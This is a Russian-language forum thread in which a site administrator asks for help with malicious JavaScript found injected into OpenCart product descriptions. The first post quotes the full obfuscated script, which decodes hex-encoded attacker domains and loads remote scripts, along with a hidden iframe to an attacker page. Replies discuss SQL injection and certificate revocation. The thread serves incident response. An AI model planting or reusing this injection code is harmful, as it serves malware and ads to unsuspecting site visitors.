JS-вирусы в описаниях товаров Opencart

A
На сайте с 04.11.2012
Offline
77
4126

Приветствую.

Имеется магаз на ocStore 1.5.4.1. Где-то месяц назад были замечены странные события на некоторых страницах сайта - в фоне открывалась какая-то тупая реклама. Наблюдал это владелец сайта, мне же не удалось обнаружить такую проблему. Поэтому решили, что проблема на его стороне - какие-то плагины в браузере левые.

Но сегодня был таки обнаружен странный жс-скрипт на некоторых страницах. Заметил не я, потому он был удален без каких-либо сожалений. Попросили, чтобы я сайт почистил, т.к. руками проверять 1500 страниц владельцу было лень.

Поиском по БД было обнаружено еще 6 страниц с таким скриптом. Вот его код:


<script>
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},a=function(o,e,t){var n=document.location.protocol+"//"+o;if(window.smlo)window.smlo.loadSmlo(n);else if(window.zSmlo)window.zSmlo.loadSmlo(n);else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("site.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script>
<p>
<iframe id="a1996667054" src="http://ui5nvtxlm.ru/f.html" style="display: none;"></iframe></p>

Вставил так, как скопировал с БД.

Почему я не успокоился после простой чистки сайта:

если кто не помнит весной была "эпидемия" фейковых заказов в ИМ . Потом выяснилось что это баловство, попытка шантажом получить денежку за якобы закрытие дыр в движке сайта. При этом в письмах, которые получали владельцы сайтов писалось, что злоумышленники якобы имеют прямой доступ к БД.

Когда были проверены возможная утечка паролей от админки сайта, фтп и т.п., но не обнаружено проблем у меня и всплыла в памяти та история.

Встречал ли кто такую проблему и как с ней боролся? Действительно ли это дыра, что дает доступ на запись в БД?

Какие мысли по этому поводу?

K5
На сайте с 21.07.2010
Offline
209
#1
Действительно ли это дыра, что дает доступ на запись в БД

раз вставки появились, значит есть дырка либо для загрузки шелла, либо для прямого спама в базу.

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
A
На сайте с 04.11.2007
Offline
134
#2
ankhorr:
... Какие мысли по этому поводу?

Гугл на запрос "sql injection opencart" говорит что есть такая проблема, вплоть до версии 1.5.6.1

siv1987
На сайте с 02.04.2009
Offline
427
#3
ankhorr:
Вот его код:

Здесь спецсимволы закодированы, в таком виде он опасности не представляет. Где вы его нашли?

A
На сайте с 04.11.2012
Offline
77
#4
siv1987:
Здесь спецсимволы закодированы, в таком виде он опасности не представляет. Где вы его нашли?

это код был вставлен в 6 карточек товаров, а именно в описании. В таком видео код был в БД сайта. Опенкарт, скорее всего, при выводе описания спецсимволы превращает в норм вид и код работает.

Еще в более чем 100 карточках были куски типа <script></script> по 2 раза, сами по себе они появиться не могли. Видать "взломщик" чет наплужил.

D
На сайте с 06.08.2015
Offline
0
#5

У нас тоже был этот скрипт.

Он загружался с https://n3dk3zr7.ru/pjs/14945/c/6361736164656c75782e7275_0.js, потом создовал iframe с https://ui5nvtxlm.ru/f.html

Наш сайт работает на HTTPS, так что скрипты вроде этого не опасны если у них нету SSL цертификата, но тут то было... оказалось что есть, от Comodo.

Я вчера написал в Comodo и сегодня получил ответ:

Hello,

We have revoked the certificates for domains ui5nvtxlm.ru and n3dk3zr7.ru

так что этот скрипт больше не опасен для сайтов с HTTPS 🍿

DE
На сайте с 07.08.2015
Offline
0
#6

У меня такое было на днях с вордпрессом, были заражены 70 товаров и 1 категория. Пришлось чистить вручную. Как это все появилось хз

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий